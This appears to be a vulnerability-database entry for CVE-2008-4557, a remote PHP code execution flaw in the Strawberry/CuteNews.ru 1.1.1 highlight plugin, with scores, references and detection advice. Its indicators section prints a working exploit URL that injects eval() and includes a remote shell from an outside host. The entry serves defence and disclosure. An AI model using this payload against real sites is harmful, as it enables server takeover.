CVE-2008-4557
Published 2008-10-14
Priority: P2 (67) · Severity: critical, 10 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 45.34% (98.6th percentile)
plugins/wacko/highlight/html.php in Strawberry in CuteNews.ru 1.1.1 (aka Strawberry) allows remote attackers to execute arbitrary PHP code via the text parameter, which is inserted into an executable regular expression.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cutephp | cutenews | — | — |
Detection & IOCs (extracted from sources)
- URL: `strawberry/plugins/wacko/highlight/html.php?text=%3C!--{${eval($s)}}--%3E&s=include('blackybr.nm.ru/shell');`
- The vulnerable parameter is `text` in html.php; an attacker injects PHP code wrapped in HTML comment syntax `<!--{${eval(...)}}-->`, which is executed via preg_replace() with the 'e' modifier.
- Monitor HTTP requests targeting `plugins/wacko/highlight/html.php` with a `text` parameter containing PHP eval/include payloads, especially URL-encoded `<!--{${...}}-->` patterns.
- The exploit payload uses `include()` to pull a remote shell from an attacker-controlled domain; detect outbound PHP include/require calls to external hosts originating from the web process.
- Exploitation requires `allow_url_include` (or `allow_url_fopen`) to be enabled in PHP for the remote `include()` payload to fetch the shell; environments with these disabled may still be vulnerable to local code injection via eval.
No detection rules found.
No writeups or analysis indexed.
References:
- http://secunia.com/advisories/28330
- http://securityreason.com/securityalert/4403
- http://www.osvdb.org/40236
- https://exchange.xforce.ibmcloud.com/vulnerabilities/39450
- https://www.exploit-db.com/exploits/4851